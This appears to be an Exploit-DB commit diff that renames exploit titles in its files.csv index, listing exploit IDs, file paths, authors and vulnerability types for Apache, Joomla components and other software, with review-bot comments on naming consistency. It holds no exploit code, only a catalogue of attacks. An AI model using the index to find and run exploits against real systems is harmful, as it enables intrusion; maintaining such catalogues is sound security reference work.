DB: 2016-12-20

9 new exploits

Apache 2.2 - (Windows) Local Denial of Service
Apache 2.2 (Windows) - Local Denial of Service

Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service
Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service

Apache 2.4.7 mod_status - Scoreboard Handling Race Condition
Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition

Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read

Apache 1.3.31 mod_include - Local Buffer Overflow
Apache 1.3.31 (mod_include) - Local Buffer Overflow

Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow
Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow

Apache 'Mod_Auth_OpenID' - Session Stealing
Apache (Mod_Auth_OpenID) - Session Stealing
Apache 2.0.4x mod_php Module - File Descriptor Leakage (1)
Apache 2.0.4x mod_php Module - File Descriptor Leakage (2)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)

Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)
Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)

Apache 1.3.x mod_include - Local Buffer Overflow
Apache 1.3.x (mod_include) - Local Buffer Overflow

Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution
RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)
Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download

Apache 1.3.x mod_mylo - Remote Code Execution
Apache 1.3.x (mod_mylo) - Remote Code Execution

Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure
Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure

Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (2)
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray

Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting
Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting

Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit
Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit

Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)
Apache (Windows x86) - Chunked Encoding (Metasploit)

Apache mod_proxy - Reverse Proxy Exposure (PoC)
Apache (mod_proxy) - Reverse Proxy Exposure (PoC)

Apache 1.3.20 - Win32 PHP.exe Remote File Disclosure
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure

Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)

Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)
Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)

Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting
Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting

Apache 7.0.x 'mod_proxy'- Reverse Proxy Security Bypass
Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass

Apache 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass
Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass

Apache 'mod_wsgi' Module - Information Disclosure
Apache (mod_wsgi) - Information Disclosure

Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection
Joomla! Component JP Jobs 1.4.1 - SQL Injection

Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion
Joomla! Component Picasa 2.0 - Local File Inclusion

Joomla! Component 'com_jinventory' - Local File Inclusion
Joomla! Component JInventory 1.23.02 - Local File Inclusion

Joomla! Component 'com_loginbox' - Local File Inclusion
Joomla! Component LoginBox - Local File Inclusion

Joomla! Component 'com_Joomlaupdater' - Local File Inclusion
Joomla! Component Magic Updater - Local File Inclusion
Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion
Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection
Joomla! Component News Portal 1.5.x - Local File Inclusion
Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection
Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion
Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion
Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion
Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion
Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion
Joomla! Component 'com_datafeeds' 880 - Local File Inclusion
Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
Joomla! Component Juke Box 1.7 - Local File Inclusion
Joomla! Component Joomla Flickr 1.0 - Local File Inclusion
Joomla! Component Highslide 1.5 - Local File Inclusion
Joomla! Component Fabrik 2.0 - Local File Inclusion
Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion
Joomla! Component 'com_javoice' - Local File Inclusion
Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
Joomla! Component JA Voice 2.0 - Local File Inclusion
Joomla! Component 'com_jfeedback' - Local File Inclusion
Joomla! Component 'com_jprojectmanager' - Local File Inclusion
Joomla! Component Jfeedback 1.2 - Local File Inclusion
Joomla! Component JProject Manager 1.0 - Local File Inclusion

Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection
Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection

Joomla! Component 'com_horoscope' - Local File Inclusion
Joomla! Component Horoscope 1.5.0 - Local File Inclusion

Joomla! Component 'com_market' - Local File Inclusion
Joomla! Component Online Market 2.x - Local File Inclusion
Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection
Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection
Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection
Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection
Joomla! Component 'com_mtfireeagle' - Local File Inclusion
Joomla! Component 'com_mediamall' - Blind SQL Injection
Joomla! Component 'com_lovefactory' - Local File Inclusion
Joomla! Component 'com_jacomment' - Local File Inclusion
Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
Joomla! Component Love Factory 1.3.4 - Local File Inclusion
Joomla! Component JA Comment - Local File Inclusion

Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection
Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection

Joomla! Component 'com_joltcard' - SQL Injection
Joomla! Component JoltCard 1.2.1 - SQL Injection
Joomla! Component 'com_gadgetfactory' - Local File Inclusion
Joomla! Component 'com_matamko' - Local File Inclusion
Joomla! Component 'com_multiroot' - Local File Inclusion
Joomla! Component 'com_multimap' - Local File Inclusion
Joomla! Component 'com_drawroot' - Local File Inclusion
Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
Joomla! Component Matamko 1.01 - Local File Inclusion
Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion

Joomla! Component 'com_if_surfalert' - Local File Inclusion
Joomla! Component iF surfALERT 1.2 - Local File Inclusion

Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection
Joomla! Component GBU Facebook 1.0.5 - SQL Injection
Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection
Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection
Joomla! Component Online News Paper Manager 1.0 - 'cid' Parameter SQL Injection
Joomla! Component JTM Reseller 1.9 Beta - SQL Injection

Joomla! Component 'com_mmsblog' - Local File Inclusion
Joomla! Component MMS Blog 2.3.0 - Local File Inclusion

Joomla! Component 'com_noticeboard' - Local File Inclusion
Joomla! Component NoticeBoard 1.3 - Local File Inclusion

Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion
Joomla! Component Graphics 1.0.6 - Local File Inclusion

Joomla! Component 'com_newsfeeds' - SQL Injection
Joomla! Component Newsfeeds - SQL Injection

Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection
Joomla! Component Komento 1.0.0 - 'sid' Parameter SQL Injection

Joomla! Component 'com_dioneformwizard' - Local File Inclusion
Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

Joomla! Component 'com_jejob' 1.0 - Local File Inclusion
Joomla! Component JE Job 1.0 - Local File Inclusion

Joomla! Component 'com_jequoteform' - Local File Inclusion
Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion

Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion
Joomla! Component MS Comment 0.8.0b - Local File Inclusion

Apache Axis2 Administration console - Authenticated Cross-Site Scripting
Apache Axis2 Administration Console - Authenticated Cross-Site Scripting

Joomla! Component 'com_mycar' - Multiple Vulnerabilities
Joomla! Component My Car 1.0 - Multiple Vulnerabilities

Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection
Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection

Joomla! Component 'com_jsjobs' - SQL Injection
Joomla! Component JS Jobs 1.0.5.8 - SQL Injection

Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities
Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities

Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection
Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection

Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection
Joomla! Component eventCal 1.6.4 - Blind SQL Injection

Joomla! Component 'com_ninjamonials' - Blind SQL Injection
Joomla! Component NinjaMonials - Blind SQL Injection

Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection
Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Parameter Blind SQL Injection
Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection
Joomla! Component 'com_huruhelpdesk' - SQL Injection
Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection

Joomla! Component 'com_joomdle' 0.24 - SQL Injection
Joomla! Component Joomdle 0.24 - SQL Injection

Joomla! Component 'com_Joomla-visites' - Remote File Inclusion
Joomla! Component Visites 1.1 RC2 - Remote File Inclusion

Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection
Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection

Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion
Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion

Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection
Joomla! Component Gantry 3.0.10 - Blind SQL Injection

Joomla! Component 'com_jphone' - Local File Inclusion
Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion

Joomla! Component 'com_jgen' - SQL Injection
Joomla! Component JGen 0.9.33 - SQL Injection

Joomla! Component 'com_ezautos' - SQL Injection
Joomla! Component Joostina - SQL Injection

Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities
Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities

Joomla! Component 'com_jedirectory' - SQL Injection
Joomla! Component JE Directory 1.0 - SQL Injection

Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities
Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities

Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar - SQL Injection

Joomla! Component 'com_flipwall' - SQL Injection
Joomla! Component Pulse Infotech Flip Wall - SQL Injection

Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection
Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection
Joomla! Component 'com_jsupport' - Cross-Site Scripting
Joomla! Component 'com_jsupport' - SQL Injection
Joomla! Component JSupport 1.5.6 - Cross-Site Scripting
Joomla! Component JSupport 1.5.6 - SQL Injection

Joomla! Component 'com_jimtawl' - Local File Inclusion
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion

phpMyAdmin - Client Side Code Injection / Redirect Link Falsification
phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification

Joomla! Component 'com_jeauto' 1.0 - SQL Injection
Joomla! Component JE Auto 1.0 - SQL Injection

Joomla! Component 'com_jradio' - Local File Inclusion
Joomla! Component JRadio - Local File Inclusion

Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion
Joomla! Component JotLoader 2.2.1 - Local File Inclusion

Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities
Joomla! Component HM Community - Multiple Vulnerabilities

Joomla! Component 'com_estateagent' - SQL Injection
Joomla! Component Estate Agent - SQL Injection

EPortfolio 1.0 - Client Side Input Validation
EPortfolio 1.0 - Client-Side Input Validation

ActiveWeb Contentserver 5.6.2929 CMS - Client Side Filtering Bypass
ActiveWeb Contentserver 5.6.2929 CMS - Client-Side Filtering Bypass
Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection
Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component JV Comment 3.0.2 - 'id' Parameter SQL Injection

Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting
Joomla! Component JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting

Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection
Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection

Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion
Joomla! Component Jstore - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection
Joomla! Component ECommerce-WD 1.2.5 - SQL Injection

Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection
Joomla! Component Contact Form Maker 1.0.1 - SQL Injection

Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities
Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection
ntop-ng 2.5.160805 - Username  Enumeration
Offensive Security 2016-12-20 05:01:16 +00:00
parent 50a756ae83
commit 62dddb2f49
12 changed files with 808 additions and 118 deletions

241
files.csv

@ -1762,7 +1762,7 @@ id,file,description,date,author,platform,type,port
15297,platforms/windows/dos/15297.txt,"Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0
15305,platforms/windows/dos/15305.pl,"RarmaRadio 2.53.1 - '.m3u' Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0
15306,platforms/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
@ -2736,7 +2736,7 @@ id,file,description,date,author,platform,type,port
22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0
22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
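Review bot: The new title for row 22068 keeps the capitalised form "(Mod_JK)", while the other module names this commit moves into parentheses are lower-case, e.g. "(mod_status)" and "(mod_include)". If the parenthesised form is meant to be a searchable convention, pick one casing and apply it here too, e.g. "(mod_jk)".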
@ -4297,7 +4297,7 @@ id,file,description,date,author,platform,type,port
34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0
34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
@ -5318,6 +5318,7 @@ id,file,description,date,author,platform,type,port
40929,platforms/osx/dos/40929.py,"Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service",2016-12-16,LiquidWorm,osx,dos,0
40933,platforms/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos,0
40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0
40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
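Review bot: The description of the added row 40944 appears to carry invisible soft-hyphen characters inside the identifier ("String­Tokenizer­T<...>::Quick­Get­Next"), as do the neighbouring rows 40933 and 40935. A plain-text search of files.csv for "StringTokenizerT" or "QuickGetNext" will not match these rows; strip the soft hyphens from the description before the row is committed.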
@ -5455,7 +5456,7 @@ id,file,description,date,author,platform,type,port
560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
@ -5573,7 +5574,7 @@ id,file,description,date,author,platform,type,port
1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0
1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
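Review bot: Row 1187 is only half normalised. The hyphenation fix to "Client-Side" is fine, but the title still uses the "Product - (Qualifier)" shape that this commit rewrites elsewhere ("Apache 2.2 - (Windows) ..." became "Apache 2.2 (Windows) - ..."), and it says "Remote" while the row sits under platforms/linux/local with type local. Either move "(+VIEWS)" in front of the dash and confirm the type, or note why this row is an exception.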
@ -6911,7 +6912,7 @@ id,file,description,date,author,platform,type,port
18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
18917,platforms/linux/local/18917.txt,"Apache 'Mod_Auth_OpenID' - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
@ -7808,11 +7809,11 @@ id,file,description,date,author,platform,type,port
23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
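Review bot: After the rename, rows 23481 and 23482 read "(mod_php) - File Descriptor Leakage (1)" and "(2)", while row 23581 reads "(mod_perl) - File Descriptor Leakage (3)". The "(3)" suffix now numbers a series that spans two different modules, so a reader searching for mod_perl finds a "(3)" with no "(1)" or "(2)". Either state both modules in all three titles or drop the shared counter from the mod_perl row.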
@ -7878,7 +7879,7 @@ id,file,description,date,author,platform,type,port
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
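Review bot: Row 24694 now reads "Apache 1.3.x (mod_include) - Local Buffer Overflow" by xCrZx, dated 2004-10-18, which is nearly identical to row 587 in this same file ("Apache 1.3.31 (mod_include) - Local Buffer Overflow", xCrZx, 2004-10-21). Since both titles are being touched in this commit, check whether the two entries are the same exploit and, if not, make the titles say what differs.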
@ -8227,6 +8228,7 @@ id,file,description,date,author,platform,type,port
34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0
34037,platforms/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win_x86,local,0
40936,platforms/linux/local/40936.html,"Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution",2016-12-18,"Hacker Fantastic",linux,local,0
34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0
